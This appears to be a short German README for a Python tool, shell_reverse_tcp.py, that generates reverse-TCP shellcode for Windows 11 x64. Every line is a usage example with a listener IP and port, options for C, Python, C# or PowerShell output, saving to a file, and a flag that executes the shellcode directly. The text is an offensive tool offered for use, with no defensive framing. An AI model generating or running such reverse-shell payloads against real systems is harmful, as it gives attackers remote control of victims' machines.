
Shellcodes für Windows >= 11 x64
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
Standardmäßig ist die Sprache C-Shellcode, außerdem Python, Csharp und PowerShell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
Zum Speichern der Datei:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
Standardmäßig ist die Ausgabe output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
Zum Testen und Ausführen:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
Und:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin